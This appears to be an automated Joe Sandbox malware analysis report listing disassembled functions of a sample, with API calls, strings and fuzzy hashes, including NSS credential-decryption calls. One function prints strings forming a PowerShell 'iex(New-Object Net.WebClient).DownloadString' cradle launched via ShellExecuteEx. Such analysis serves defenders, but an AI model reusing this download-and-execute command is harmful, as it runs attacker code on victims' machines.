                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 167551676-0
                                                                                          • Opcode ID: c4aa0a3e78aabed58fec12085c2f0da7f196276ca8538e7cc28443fa9e006273
                                                                                          • Instruction ID: 4fb66fc9f0e99d4a69d4435a00fe4e0f35192ff1271240cc59f29c1c24f4a50f
                                                                                          • Opcode Fuzzy Hash: c4aa0a3e78aabed58fec12085c2f0da7f196276ca8538e7cc28443fa9e006273
                                                                                          • Instruction Fuzzy Hash: 663188B290021CA7CB24FBA0DC85EDD773DAB58708F40459EB60596091EE7897C9CFA8
                                                                                          Function 004127A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412895
                                                                                          Strings
                                                                                          • ')", xrefs: 004127C3
                                                                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004127D4
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412814
                                                                                          • <, xrefs: 00412849
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          • API String ID: 3031569214-898575020
                                                                                          • Opcode ID: b7ac0e70d2071aadd9871795a77bcaf4d97f3dece041312351e8f8409e2407f1
                                                                                          • Instruction ID: d376e5d026b6a94438bc85289873f11b5c9f1c1e596dc166cf9a62b6ff5812d0
                                                                                          • Opcode Fuzzy Hash: b7ac0e70d2071aadd9871795a77bcaf4d97f3dece041312351e8f8409e2407f1
                                                                                          • Instruction Fuzzy Hash: 0E412F70D11208AACB14FFA1D896BDDB778AF10318F40411EF41667192EF782AD9CF5A
                                                                                          Function 6CA874A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetLastError.KERNEL32(00000000), ref: 6CA87526
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA87566
                                                                                          • __Init_thread_footer.LIBCMT ref: 6CA87597
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer$ErrorLast
                                                                                          • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                          • API String ID: 3217676052-1401603581
                                                                                          • Opcode ID: bc6c75d38ac5023bdd70eb0fa2b7d89a3e537397b0775e9d728fcb28d382f233
                                                                                          • Instruction ID: 3739f9317f17abd59234f0ad16f1d87b276d09769df18b113fb94def77e426ef
                                                                                          • Opcode Fuzzy Hash: bc6c75d38ac5023bdd70eb0fa2b7d89a3e537397b0775e9d728fcb28d382f233
                                                                                          • Instruction Fuzzy Hash: 1621B631B02603ABCB1C9BE9DD54E693376EB86324B05852DF80597F80D731A8C786A5
                                                                                          Function 6CB30DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CB30BDE), ref: 6CB30DCB
                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6CB30BDE), ref: 6CB30DEA
                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CB30BDE), ref: 6CB30DFC
                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CB30BDE), ref: 6CB30E32
                                                                                          Strings
                                                                                          • %s incr => %d (find lib), xrefs: 6CB30E2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: strrchr$Print_stricmp
                                                                                          • String ID: %s incr => %d (find lib)
                                                                                          • API String ID: 97259331-2309350800
                                                                                          • Opcode ID: 3d29636f523407e4e8be8f93585ca468183aa330d16e611e0d91c51120c08ece
                                                                                          • Instruction ID: 69f7c9cbfe609cae3f7f4ef44a37f27723afe2c39d8eb6c8b5dfd5573e578377
                                                                                          • Opcode Fuzzy Hash: 3d29636f523407e4e8be8f93585ca468183aa330d16e611e0d91c51120c08ece
                                                                                          • Instruction Fuzzy Hash: 0701F172B002709FE6209E29EC49E1773BCDF45A09B45446DE909D3A81F661EC2486E1
                                                                                          Function 004108A0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strtok_s.MSVCRT ref: 004108C8
                                                                                          • strtok_s.MSVCRT ref: 00410A0D
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: strtok_s$lstrcpylstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 348468850-0
                                                                                          • Opcode ID: a1e044df2dc2ec3bc87bdc03517e80c54e8b62564882ec64cb6b643e3b51a76b
                                                                                          • Instruction ID: a4e7387e48c2c71d0e19e82ff460fffa0707391e6f0b4b4f43623f0e69075298
                                                                                          • Opcode Fuzzy Hash: a1e044df2dc2ec3bc87bdc03517e80c54e8b62564882ec64cb6b643e3b51a76b
                                                                                          • Instruction Fuzzy Hash: 62515AB5A04209DFCB08CF54D495AEE7BB5FF58308F10806AE802AB351D774EAD1CB95
                                                                                          Function 00409E60 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcmp.MSVCRT ref: 00409E7B
                                                                                          • memset.MSVCRT ref: 00409EAE
                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                          • String ID: @$v10
                                                                                          • API String ID: 1400469952-24753345
                                                                                          • Opcode ID: c1044b3830b5109d2d3414717a1b4bfcf227ba841008d5ccdf2d40fe1e891b15
                                                                                          • Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
                                                                                          • Opcode Fuzzy Hash: c1044b3830b5109d2d3414717a1b4bfcf227ba841008d5ccdf2d40fe1e891b15
                                                                                          • Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99
                                                                                          Function 6CB3EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB3EDFD
                                                                                          • calloc.MOZGLUE(00000001,00000000), ref: 6CB3EE64
                                                                                          • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CB3EECC
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB3EEEB
                                                                                          • free.MOZGLUE(?), ref: 6CB3EEF6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorValuecallocfreememcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3833505462-0
                                                                                          • Opcode ID: 52861f2c72f298362d5803a7002368b213b2b5cdd67858f4195a9cb05eea07dc
                                                                                          • Instruction ID: 3393df5fe9af00ceae5c1728fecc964d765a6ee2946e06c2226df58477504a4c
                                                                                          • Opcode Fuzzy Hash: 52861f2c72f298362d5803a7002368b213b2b5cdd67858f4195a9cb05eea07dc
                                                                                          • Instruction Fuzzy Hash: 79312571A002F09BEB209F29DC44B6E7BB4FB46704F14152AE85E87A90DB31EC15CBD2
                                                                                          Function 6CB4AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6CB43FFF,00000000,?,?,?,?,?,6CB41A1C,00000000,00000000), ref: 6CB4ADA7
                                                                                            • Part of subcall function 6CBA14C0: TlsGetValue.KERNEL32 ref: 6CBA14E0
                                                                                            • Part of subcall function 6CBA14C0: EnterCriticalSection.KERNEL32 ref: 6CBA14F5
                                                                                            • Part of subcall function 6CBA14C0: PR_Unlock.NSS3 ref: 6CBA150D
                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CB43FFF,00000000,?,?,?,?,?,6CB41A1C,00000000,00000000), ref: 6CB4ADB4
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6CB43FFF,?,?,?,?,6CB43FFF,00000000,?,?,?,?,?,6CB41A1C,00000000), ref: 6CB4ADD5
                                                                                            • Part of subcall function 6CB9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB98D2D,?,00000000,?), ref: 6CB9FB85
                                                                                            • Part of subcall function 6CB9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB9FBB1
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CC694B0,?,?,?,?,?,?,?,?,6CB43FFF,00000000,?), ref: 6CB4ADEC
                                                                                            • Part of subcall function 6CB9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC718D0,?), ref: 6CB9B095
                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB43FFF), ref: 6CB4AE3C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2372449006-0
                                                                                          • Opcode ID: c05a818671cb4629dd5fe5ce490f6ecf30f66d938ba47ce86d81970cea1b895c
                                                                                          • Instruction ID: d835732d43601e53db8f069264f9355369d7515199d46c58d0caa962886bac70
                                                                                          • Opcode Fuzzy Hash: c05a818671cb4629dd5fe5ce490f6ecf30f66d938ba47ce86d81970cea1b895c
                                                                                          • Instruction Fuzzy Hash: 37117B71E042545BE7109B659C40FBF73B8DF5124CF048138FC6996741FB20E95996E3
                                                                                          Function 6CB68E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_GetInternalKeySlot.NSS3(?,?,?,6CB82E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB54F1C), ref: 6CB68EA2
                                                                                            • Part of subcall function 6CB8F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CB8F854
                                                                                            • Part of subcall function 6CB8F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CB8F868
                                                                                            • Part of subcall function 6CB8F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CB8F882
                                                                                            • Part of subcall function 6CB8F820: free.MOZGLUE(04C483FF,?,?), ref: 6CB8F889
                                                                                            • Part of subcall function 6CB8F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CB8F8A4
                                                                                            • Part of subcall function 6CB8F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CB8F8AB
                                                                                            • Part of subcall function 6CB8F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CB8F8C9
                                                                                            • Part of subcall function 6CB8F820: free.MOZGLUE(280F10EC,?,?), ref: 6CB8F8D0
                                                                                          • PK11_IsLoggedIn.NSS3(?,?,?,6CB82E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB54F1C), ref: 6CB68EC3
                                                                                          • TlsGetValue.KERNEL32(?,?,?,6CB82E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB54F1C), ref: 6CB68EDC
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6CB82E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB68EF1
                                                                                          • PR_Unlock.NSS3 ref: 6CB68F20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                          • String ID:
                                                                                          • API String ID: 1978757487-0
                                                                                          • Opcode ID: 08fac6838b7e3126ab78fe358880cdcb9c13fe9e93e3c74ff61ae7bc30f85f3e
                                                                                          • Instruction ID: 2c65dbd143544f75e2f03b92693a63204c2d77c7282df45382954d535b0bff72
                                                                                          • Opcode Fuzzy Hash: 08fac6838b7e3126ab78fe358880cdcb9c13fe9e93e3c74ff61ae7bc30f85f3e
                                                                                          • Instruction Fuzzy Hash: D6217A71A096459FCB00AF2AD18819DBBF0FF49318F41496EE8989BB41DB31E854CBC2
                                                                                          Function 004163C0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemTime.KERNEL32(004210DC,?,?,004165B1,00000000,?,00816A50,?,004210DC,?,00000000,?), ref: 0041640C
                                                                                          • sscanf.NTDLL ref: 00416439
                                                                                          • SystemTimeToFileTime.KERNEL32(004210DC,00000000,?,?,?,?,?,?,?,?,?,?,?,00816A50,?,004210DC), ref: 00416452
                                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00816A50,?,004210DC), ref: 00416460
                                                                                          • ExitProcess.KERNEL32 ref: 0041647A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$System$File$ExitProcesssscanf
                                                                                          • String ID:
                                                                                          • API String ID: 2533653975-0
                                                                                          • Opcode ID: 133a721e8e5304a43f708b30927c38ecfdd2bdc5b98ba3cf0c569bd1b0c45b2d
                                                                                          • Instruction ID: 830abe8b8eab449a7d9cc0da15019f7c77d9f2c5bac1468e5daa421451f66edb
                                                                                          • Opcode Fuzzy Hash: 133a721e8e5304a43f708b30927c38ecfdd2bdc5b98ba3cf0c569bd1b0c45b2d
                                                                                          • Instruction Fuzzy Hash: EA21E1B5D14208AFCF14EFE4D945ADEB7BABF48304F04852EE50AE3250EB349605CB69
                                                                                          Function 00418260 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DF8,00000000,?), ref: 004182CF
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DF8,00000000,?), ref: 004182D6
                                                                                          • wsprintfA.USER32 ref: 004182F0
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
